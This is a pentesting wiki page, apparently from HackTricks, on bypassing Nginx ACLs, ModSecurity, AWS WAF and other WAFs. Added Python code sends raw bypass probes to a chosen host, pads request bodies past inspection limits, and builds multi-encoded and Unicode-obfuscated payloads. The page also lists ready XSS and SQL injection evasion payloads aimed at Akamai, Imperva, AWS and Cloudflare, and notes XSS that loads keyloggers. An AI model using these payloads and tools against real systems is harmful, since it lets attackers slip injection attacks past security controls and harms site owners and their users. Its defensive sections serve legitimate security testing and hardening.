Proxy / WAF Protections Bypass

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Bypass Nginx ACL Rules with Pathname Manipulation

Techniques taken from this research.

Example Nginx rules:

location = /admin {
deny all;
}

location = /admin/ {
deny all;
}

To prevent bypasses, Nginx normalizes the path before checking it against the location rules. However, if the backend server applies a different normalization (stripping characters that nginx leaves in place), it may be possible to bypass this protection: nginx sees a path that does not match the denied location, while the backend strips the extra character and serves the denied resource.

NodeJS - Express

Nginx version   Node.js bypass characters
1.22.0          \xA0
1.21.6          \xA0
1.20.2          \xA0, \x09, \x0C
1.18.0          \xA0, \x09, \x0C
1.16.1          \xA0, \x09, \x0C

Flask

Nginx version   Flask bypass characters
1.22.0          \x85, \xA0
1.21.6          \x85, \xA0
1.20.2          \x85, \xA0, \x1F, \x1E, \x1D, \x1C, \x0C, \x0B
1.18.0          \x85, \xA0, \x1F, \x1E, \x1D, \x1C, \x0C, \x0B
1.16.1          \x85, \xA0, \x1F, \x1E, \x1D, \x1C, \x0C, \x0B

Spring Boot

Nginx version   Spring Boot bypass characters
1.22.0          ;
1.21.6          ;
1.20.2          \x09, ;
1.18.0          \x09, ;
1.16.1          \x09, ;

PHP-FPM

Nginx PHP-FPM configuration:

location = /admin.php {
deny all;
}

location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/run/php/php8.1-fpm.sock;
}

Nginx is configured to deny access to /admin.php, but this can be bypassed by requesting /admin.php/index.php: the exact-match location no longer matches, the regex location ~ \.php$ still does, and PHP-FPM ends up executing /admin.php.
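The following is an added example (not part of the original page or of the cited research) that turns the tables above and the PHP-FPM trick into a probe generator. It assumes the protected path is /admin (or /admin.php for PHP-FPM) and that the target speaks plain HTTP on port 80; the request line is built by hand because HTTP client libraries would re-encode or reject the control bytes before they reach the wire.

```python
import socket
from urllib.parse import quote

# Candidate bytes taken from the tables above, keyed by backend framework.
# "location = /admin" is an exact match on the path nginx sees, so
# "/admin\xa0" falls through to the proxied location, while the backend
# strips the trailing byte and routes the request to /admin.
BYPASS_BYTES = {
    "express": [b"\xa0", b"\x09", b"\x0c"],
    "flask": [b"\x85", b"\xa0", b"\x1f", b"\x1e", b"\x1d", b"\x1c", b"\x0c", b"\x0b"],
    "spring": [b"\x09", b";"],
}


def build_probes(path, backend):
    """Return (label, raw_path) pairs for one protected path.

    Each byte is tried raw (as in the research) and percent-encoded,
    since some proxies decode the path before matching locations.
    """
    probes = []
    for b in BYPASS_BYTES[backend]:
        probes.append((f"raw 0x{b[0]:02x}", path.encode() + b))
        probes.append((f"pct 0x{b[0]:02x}", path.encode() + quote(b).encode()))
    return probes


def php_fpm_probe(path):
    """/admin.php is denied by 'location = /admin.php', but /admin.php/index.php
    still matches 'location ~ \\.php$'. With Debian's fastcgi-php.conf snippet
    fastcgi_split_path_info hands PHP-FPM SCRIPT_FILENAME=/admin.php and
    PATH_INFO=/index.php, so the denied script runs anyway."""
    return path + "/index.php"


def raw_request(host, raw_path):
    """Hand-build the request so the bypass byte is sent exactly as chosen."""
    return (b"GET " + raw_path + b" HTTP/1.1\r\n"
            b"Host: " + host.encode() + b"\r\n"
            b"Connection: close\r\n\r\n")


def send_raw(host, port, raw_path, timeout=5):
    """Send one probe and return the status line (network call; not exercised offline)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(raw_request(host, raw_path))
        reply = s.recv(4096)
    return reply.split(b"\r\n", 1)[0].decode(errors="replace")


if __name__ == "__main__":
    # Dry run prints the probes; pass a hostname as argv[1] to actually send them.
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    probes = build_probes("/admin", "express")
    probes.append(("php-fpm", php_fpm_probe("/admin.php").encode()))
    for label, raw_path in probes:
        if target:
            print(label, send_raw(target, 80, raw_path))
        else:
            print(label, raw_request("target.example", raw_path).split(b"\r\n", 1)[0])
```

A 403 for every probe means nginx (or the backend) normalizes consistently; a 200 on a single variant tells you which byte survives nginx and is dropped by the backend. Compare against the nginx version in the Server header, since the tables above show the working set shrinks in newer releases.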

How to prevent

location ~* ^/admin {
deny all;
}

Bypass Mod Security Rules

Path Confusion

In this post it is explained that ModSecurity v3 (up to 3.0.12) incorrectly implemented the REQUEST_FILENAME variable, which was supposed to contain the accessed path (up to the start of the parameters). This happened because the engine URL-decoded the request before extracting the path.
Therefore, for a request like http://example.com/foo%3f';alert(1);foo= ModSecurity assumed the path was just /foo, because %3f was turned into ?, which terminates the URL path; the path the server actually receives, however, is /foo%3f';alert(1);foo=.

The variables REQUEST_BASENAME and PATH_INFO were also affected by this bug.

Something similar happened in ModSecurity version 2, allowing a bypass of a protection that prevented users from accessing files with specific backup-related extensions (such as .bak) simply by sending the dot URL-encoded as %2e, for example: https://example.com/backup%2ebak.
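The two ordering mistakes described above, reproduced in an added example that is not ModSecurity code: a v3-style "decode, then cut at ?" extraction, a v2-style "match the raw path" extraction, and the correct "cut at ?, then decode" order, each fed to a stand-in for a SecRule running a regex against REQUEST_FILENAME. The rule patterns are assumptions chosen to mirror the two bypasses.

```python
import re
from urllib.parse import unquote


def request_filename_v3_buggy(request_uri):
    """ModSecurity v3 <= 3.0.12 as described above: the URI is URL-decoded
    first and only then cut at '?', so an encoded %3f truncates the path."""
    return unquote(request_uri).split("?", 1)[0]


def request_filename_raw(request_uri):
    """The v2-style mistake: match on the undecoded path, so %2e is not a dot."""
    return request_uri.split("?", 1)[0]


def request_filename_correct(request_uri):
    """Split off the query string on the raw URI, then decode the path part."""
    return unquote(request_uri.split("?", 1)[0])


def rule_hits(filename, pattern):
    """Stand-in for a SecRule on REQUEST_FILENAME using the @rx operator."""
    return re.search(pattern, filename) is not None


if __name__ == "__main__":
    for uri, pattern in [("/foo%3f';alert(1);foo=", r"alert\("), ("/backup%2ebak", r"\.bak$")]:
        for name, fn in [("v3 buggy", request_filename_v3_buggy),
                         ("raw", request_filename_raw),
                         ("correct", request_filename_correct)]:
            print(f"{uri:28} {name:9} -> {fn(uri)!r:28} hit={rule_hits(fn(uri), pattern)}")
```

The takeaway for rule writers: a rule on REQUEST_FILENAME is only as good as the engine's path extraction, so pair it with a rule on the raw REQUEST_URI (which ModSecurity exposes undecoded) whenever the protected file name can be reached through encoding tricks.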

Bypass AWS WAF ACL

Malformed Header

This research mentions that it was possible to bypass AWS WAF rules applied to HTTP headers by sending a "malformed" header that AWS did not parse properly but the backend server did.

For example, sending the following request with a SQL injection in the header X-Query:

GET / HTTP/1.1\r\n
Host: target.com\r\n
X-Query: Value\r\n
\t' or '1'='1' -- \r\n
Connection: close\r\n
\r\n

It was possible to bypass AWS WAF because it did not treat the following line as part of the header value, while the Node.js server did (this has since been fixed).
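The parser disagreement behind this bypass, as an added example that is not part of the research or of any vendor's code: one parser treats every line as its own header and drops a line with no colon (the WAF's view described above), the other honours RFC 7230 obs-fold, where a line starting with SP or HTAB continues the previous header's value (the Node.js view at the time). The raw request is a constructed copy of the one shown above.

```python
# Constructed sample, mirroring the request above: the second line of
# X-Query starts with a tab, which is the obs-fold continuation syntax.
RAW_REQUEST = (
    b"GET / HTTP/1.1\r\n"
    b"Host: target.com\r\n"
    b"X-Query: Value\r\n"
    b"\t' or '1'='1' -- \r\n"
    b"Connection: close\r\n"
    b"\r\n"
)


def parse_headers_strict(raw):
    """'WAF view': each line is an independent header; a line without a
    colon is skipped, so the injection never becomes part of X-Query."""
    headers = {}
    for line in raw.split(b"\r\n")[1:]:
        if not line:
            break
        if b":" not in line:
            continue
        name, value = line.split(b":", 1)
        headers[name.strip().lower().decode()] = value.strip().decode()
    return headers


def parse_headers_obsfold(raw):
    """'Backend view': a line beginning with SP/HTAB is folded into the
    previous header's value, as RFC 7230 obs-fold allows."""
    headers = {}
    last = None
    for line in raw.split(b"\r\n")[1:]:
        if not line:
            break
        if line[:1] in (b" ", b"\t") and last is not None:
            headers[last] += b" " + line.strip()
            continue
        name, value = line.split(b":", 1)
        last = name.strip().lower().decode()
        headers[last] = value.strip()
    return {k: v.decode() for k, v in headers.items()}


if __name__ == "__main__":
    print("WAF sees     X-Query =", parse_headers_strict(RAW_REQUEST).get("x-query"))
    print("backend sees X-Query =", parse_headers_obsfold(RAW_REQUEST).get("x-query"))
```

When testing a WAF/backend pair for this class of issue, the question is never "is obs-fold valid" but whether the two parsers agree; any header the backend reconstructs differently from the WAF is a blind spot for header-based rules.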

Generic WAF bypasses

Request size limits

Commonly WAFs have a certain length limit of requests to check, and if a POST/PUT/PATCH request body is over it, the WAF won't inspect the part beyond the limit (or, depending on configuration, the request at all).

  • AWS WAF ACL
    Maximum size of a web request body that can be inspected for Application Load Balancer and AWS AppSync protections: 8 KB
    Maximum size of a web request body that can be inspected for CloudFront, API Gateway, Amazon Cognito, App Runner, and Verified Access protections: 64 KB
  • Azure WAF
    Older Web Application Firewalls with Core Rule Set 3.1 (or lower) allow messages larger than 128 KB by turning off request body inspection, but these messages won't be checked for vulnerabilities. For newer versions (Core Rule Set 3.2 or newer), the same can be done by disabling the maximum request body limit. When a request exceeds the size limit:
      • Prevention mode: logs and blocks the request.
      • Detection mode: inspects up to the limit, ignores the rest, and logs if the Content-Length exceeds the limit.
  • Akamai
    By default, the WAF inspects only the first 8 KB of a request. The limit can be raised to 128 KB by adding Advanced Metadata.
  • Cloudflare
    Up to 128 KB.
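An added example (not from the page or from the nowafpls tool listed below) of how the padding trick is built: a parameter the application ignores is placed first in the body and filled past the inspection limit, so everything the WAF reads is filler and the real parameters begin beyond the cutoff. The limit table and the name of the ignored field (_pad) are assumptions; the limits are the vendor figures quoted above.

```python
import json
from urllib.parse import urlencode

# Inspection limits (KB) quoted above for each product; assumed defaults.
LIMITS_KB = {"aws-alb": 8, "aws-cloudfront": 64, "akamai-default": 8,
             "azure": 128, "cloudflare": 128}


def pad_form_body(fields, limit_kb, junk_field="_pad"):
    """Put limit_kb KB (+1 byte) of filler in a parameter the application
    ignores, *before* the real parameters, so the inspected prefix is
    harmless and the payload starts past the cutoff."""
    filler = "A" * (limit_kb * 1024 + 1)
    ordered = [(junk_field, filler)] + list(fields.items())
    return urlencode(ordered)


def pad_json_body(obj, limit_kb, junk_key="_pad"):
    """Same idea for JSON bodies: the junk key is serialised first
    because dict insertion order is preserved by json.dumps."""
    padded = {junk_key: "A" * (limit_kb * 1024 + 1)}
    padded.update(obj)
    return json.dumps(padded)


def payload_offset(body, marker):
    """Byte offset where the real payload begins; it must exceed the limit."""
    return body.encode().find(marker.encode())


def json_field(body, key):
    """What the application actually parses out of the padded JSON body."""
    return json.loads(body)[key]


if __name__ == "__main__":
    body = pad_form_body({"user": "' OR 1=1--"}, LIMITS_KB["aws-alb"])
    print(len(body), "bytes; payload starts at", payload_offset(body, "user="))
```

Two caveats before relying on this: the backend must tolerate the unknown field (strict schema validation will reject it), and a WAF configured to block over-limit bodies, such as Azure WAF in prevention mode above, turns the padding into a 403 rather than a bypass, so check the product's over-limit behaviour first.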

Static assets inspection gaps (.js GETs)

Some CDN/WAF stacks apply weak or no content inspection to GET requests for static assets (for example paths ending with .js), while still applying global rules like rate limiting and IP reputation. Combined with auto-caching of static extensions, this can be abused to deliver or seed malicious variants that affect subsequent HTML responses.

Practical usage:

  • Send payloads in untrusted headers (e.g. User-Agent) on a GET to a .js path to avoid content inspection, then immediately request the main HTML to poison the cached variant.
  • Use clean/fresh IPs; once an IP is flagged, routing changes can make the technique unreliable.
  • In Burp Repeater, use "Send group in parallel" (single-packet style) to race the two requests (.js then HTML) through the same front-end path.

This pairs well with header-reflection cache poisoning. See:

Cache Poisoning and Cache Deception

Obfuscation

# IIS, ASP Classic
<%s%cr%u0131pt> == <script>

# Path blacklist bypass - Tomcat
/path1/path2/ == ;/path1;foo/path2;bar/;

Unicode compatibility

Depending on the implementation of Unicode normalization (more info here), characters that share Unicode compatibility may bypass the WAF and be executed as the intended payload once the backend normalizes them. Compatible characters can be found here.

Example

# under the NFKD normalization algorithm, the characters on the left translate
# to the XSS payload on the right
<img src⁼p onerror⁼'prompt⁽1⁾'﹥  --> <img src=p onerror='prompt(1)'>
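An added example (not from the page) using Python's unicodedata to reproduce the transformation above and, more usefully, to enumerate the compatibility equivalents of any ASCII character so a payload can be rebuilt from them. Only the Basic Multilingual Plane is scanned by default (the superscript and small-form variants used above live there); raise the upto parameter to include the mathematical alphanumerics in the supplementary planes.

```python
import unicodedata


def normalize(s, form="NFKD"):
    """What a normalising backend (or WAF) sees after compatibility decomposition."""
    return unicodedata.normalize(form, s)


def compat_variants(ascii_char, form="NFKC", upto=0x10000):
    """Code points below `upto` whose compatibility normalisation collapses
    to exactly `ascii_char`."""
    return [chr(cp) for cp in range(0x80, upto)
            if unicodedata.normalize(form, chr(cp)) == ascii_char]


def obfuscate(payload, replacements):
    """Swap selected characters for chosen compatibility equivalents."""
    return "".join(replacements.get(c, c) for c in payload)


def variant_map(payload):
    """For each ASCII punctuation character in the payload, list its variants;
    letters and digits are skipped because their variants rarely survive a regex."""
    return {c: compat_variants(c) for c in set(payload)
            if c < "\x80" and not c.isalnum() and not c.isspace()}


if __name__ == "__main__":
    obf = "<img src⁼p onerror⁼'prompt⁽1⁾'﹥"
    print(obf, "->", normalize(obf))
    for ch, variants in variant_map("<img src=p onerror='prompt(1)'>").items():
        print(repr(ch), "".join(variants))
```

The bypass only works where the WAF matches on the raw bytes and the backend normalizes (NFKC/NFKD) before using the value; if the WAF normalizes too, or the backend never does, the obfuscated payload is either caught or inert.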

Bypassing contextual WAFs with encodings

As explained in this blog post, to bypass WAFs that keep track of the context of user input, we can abuse the WAF's own normalization so that it decodes the input into something that looks harmless, while the application (and the victim's browser) sees the still-encoded, still-dangerous version.

For example, the post mentions that Akamai URL-decoded user input 10 times. So something like <input/%2525252525252525253e/onfocus is seen by Akamai as <input/>/onfocus, which it may consider fine because the tag is closed. However, as long as the application does not URL-decode 10 times, the victim will see something like <input/%25252525252525253e/onfocus, which is still valid for an XSS attack.

This allows hiding payloads in encoded parts that the WAF will decode and interpret while the victim will not.

This works not only with URL-encoded payloads but also with other encodings such as unicode, hex, octal...
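The multi-layer encoding trick worked through in an added example (not from the blog post): a character is URL-encoded N times so that a WAF decoding N times sees the closing bracket while an application decoding once still sees an encoded attribute name. The 10 rounds for Akamai are the figure quoted above; the "looks closed" check is a toy stand-in for a context-aware rule, not a real WAF heuristic.

```python
from urllib.parse import quote, unquote


def multi_encode(s, rounds):
    """URL-encode `s` `rounds` times; each pass re-encodes the '%' of the previous one."""
    for _ in range(rounds):
        s = quote(s, safe="")
    return s


def decode_rounds(s, rounds):
    """Apply URL-decoding `rounds` times (unquote is a no-op once nothing is encoded)."""
    for _ in range(rounds):
        s = unquote(s)
    return s


def looks_closed(fragment):
    """Toy context check: a '>' in the fragment means the tag is 'closed'."""
    return ">" in fragment


def craft(prefix, hidden, suffix, waf_rounds, app_rounds):
    """Hide `hidden` under waf_rounds encoding layers.

    Returns (sent, waf_view, app_view): what goes on the wire, what a WAF
    decoding waf_rounds times sees, and what an app decoding app_rounds times sees.
    """
    sent = prefix + multi_encode(hidden, waf_rounds) + suffix
    return sent, decode_rounds(sent, waf_rounds), decode_rounds(sent, app_rounds)


if __name__ == "__main__":
    sent, waf, app = craft("<input/", ">", "/onfocus=alert(1) autofocus", waf_rounds=10, app_rounds=1)
    print("wire:", sent)
    print("WAF :", waf, "closed" if looks_closed(waf) else "open")
    print("app :", app, "closed" if looks_closed(app) else "open")
```

The number of rounds is the only tunable: it must equal the WAF's decode depth (found by trial, as the blog did for Akamai) and exceed the application's, otherwise the two views collapse to the same string and the context trick fails.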

In the post, the final bypasses proposed are:

  • Akamai: akamai.com/?x=<x/%u003e/tabindex=1 autofocus/onfocus=x=self;x['ale'%2b'rt'](999)>
  • Imperva: imperva.com/?x=<x/\x3e/tabindex=1 style=transition:0.1s autofocus/onfocus="a=document;b=a.defaultView;b.ontransitionend=b['aler'%2b't'];style.opacity=0;Object.prototype.toString=x=>999">
  • AWS/CloudFront: docs.aws.amazon.com/?x=<x/%26%23x3e;/tabindex=1 autofocus/onfocus=alert(999)>
  • Cloudflare: cloudflare.com/?x=<x tabindex=1 autofocus/onfocus="style.transition='0.1s';style.opacity=0;self.ontransitionend=alert;Object.prototype.toString=x=>999">

It is also mentioned that, depending on how a WAF understands the context of the user input, it may be possible to abuse that understanding directly. The example given in the blog is that Akamai allowed anything between /* and */ (presumably because this is commonly used for comments). Therefore, a SQL injection such as /*'or sleep(5)-- -*/ is not detected and is still valid, since /* is the opening string of the injection and */ ends up commented out.

These kinds of context problems can also be used to exploit vulnerabilities other than the one the WAF expects in that context (e.g. the same gap could be used to exploit an XSS).

Inline JavaScript first-statement inspection gaps

Inline inspection rulesets may only analyze the first JavaScript statement inside an event handler. By placing a benign-looking parenthesized expression followed by a semicolon (e.g. onfocus="(history.length);payload"), the attacker code after the semicolon passes inspection while the browser still executes it. Combining this with a fragment-triggered focus (e.g. appending #forgot_btn so the targeted element is focused on load) allows click-free XSS that can immediately call $.getScript and load phishing tooling such as keyloggers. See the attribute-only login XSS case study derived from this research.

H2C Smuggling

Upgrade Header Smuggling

IP Rotation

Regex Bypasses

Different techniques can be used to bypass the regex filters on firewalls. Examples include alternating case, adding line breaks, and encoding payloads. Resources for the various bypasses are available at PayloadsAllTheThings and OWASP. The examples below were taken from this article.

<sCrIpT>alert(XSS)</sCriPt> #changing the case of the tag
<<script>alert(XSS)</script> #prepending an additional "<"
<script>alert(XSS) // #removing the closing tag
<script>alert`XSS`</script> #using backticks instead of parentheses
java%0ascript:alert(1) #using encoded newline characters
<iframe src=http://malicous.com < #double open angle brackets
<STYLE>.classname{background-image:url("javascript:alert(XSS)");}</STYLE> #uncommon tags
<img/src=1/onerror=alert(0)> #bypass space filter by using / where a space is expected
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>xss</a> #extra characters
Function("ale"+"rt(1)")(); #using uncommon functions besides alert, console.log, and prompt
javascript:74163166147401571561541571411447514115414516216450615176 #octal encoding
<iframe src="javascript:alert(`xss`)"> #unicode encoding
/?id=1+un/**/ion+sel/**/ect+1,2,3-- #using comments in SQL query to break up statement
new Function`alt\`6\``; #using backticks instead of parentheses
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascript
%26%2397;lert(1) #using HTML encoding
<a src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(XSS)"> #Using Line Feed (LF) line breaks
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()> # use any chars that aren't letters, numbers, or encapsulation chars between event handler and equal sign (only works on Gecko engine)
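An added example (not from the article) that runs a handful of the payloads above through two rules: a literal, case-sensitive pattern of the kind these tricks are written against, and the same intent matched after canonicalization (repeated URL- and HTML-decoding, control-character stripping, whitespace collapsing, lower-casing). The sample list and both patterns are constructed for the demonstration; the hardened pattern is illustrative, not a complete XSS ruleset.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample set, copied from the list above
PAYLOADS = [
    "<sCrIpT>alert(XSS)</sCriPt>",
    "<<script>alert(XSS)</script>",
    "<script>alert(XSS) //",
    "java%0ascript:alert(1)",
    "<img/src=1/onerror=alert(0)>",
    "%26%2397;lert(1)",
    "<a src=\"%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(XSS)\">",
]

# A literal, case-sensitive rule: exactly what case flipping and encoding evade
NAIVE = re.compile(r"<script>|javascript:")


def naive_match(s):
    return NAIVE.search(s) is not None


def canonicalize(s):
    """Undo the layers the bypasses rely on before matching."""
    prev = None
    while prev != s:                          # repeat until stable: nested encodings
        prev = s
        s = html.unescape(unquote(s))         # %26%2397; -> &#97; -> a
    s = re.sub(r"[\x00-\x1f\x7f]", "", s)     # LF/tab splitting tokens: java\nscript
    s = re.sub(r"\s+", " ", s)
    return s.lower()


# Matched against the canonical form: any case, optional whitespace, backtick calls
HARDENED = re.compile(
    r"<\s*script\b|javascript\s*:|\b(?:alert|confirm|prompt)\s*[(`]|\bon\w+\s*="
)


def hardened_match(s):
    return HARDENED.search(canonicalize(s)) is not None


def report(payloads=PAYLOADS):
    """(payload, caught_by_naive, caught_by_hardened) for each sample."""
    return [(p, naive_match(p), hardened_match(p)) for p in payloads]


if __name__ == "__main__":
    for payload, naive, hardened in report():
        print(f"naive={naive!s:5} hardened={hardened!s:5} {payload}")
```

Note what canonicalization does not fix: the last three payloads on the list above (non-alphanumeric junk between the handler name and =, the Function("ale"+"rt") constructor, base64 data: URLs) survive it, which is why regex-only inspection is a speed bump rather than a control and output encoding in the application remains the fix.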

Tools

  • nowafpls: Burp extension that adds junk data to requests to bypass WAFs by exceeding their inspection length

References
